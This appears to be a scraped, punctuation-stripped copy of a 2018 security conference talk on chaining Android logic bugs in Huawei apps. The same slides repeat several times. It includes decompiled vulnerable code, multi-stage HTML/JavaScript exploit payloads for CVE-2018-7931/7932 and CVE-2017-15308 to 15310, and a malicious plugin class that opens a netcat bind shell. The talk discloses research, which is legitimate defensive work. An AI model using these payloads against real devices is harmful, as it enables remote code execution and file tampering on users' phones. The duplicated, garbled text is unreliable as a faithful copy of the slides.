bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 13: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/13.jpg)
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 14: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/14.jpg)
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 15: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/15.jpg)
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
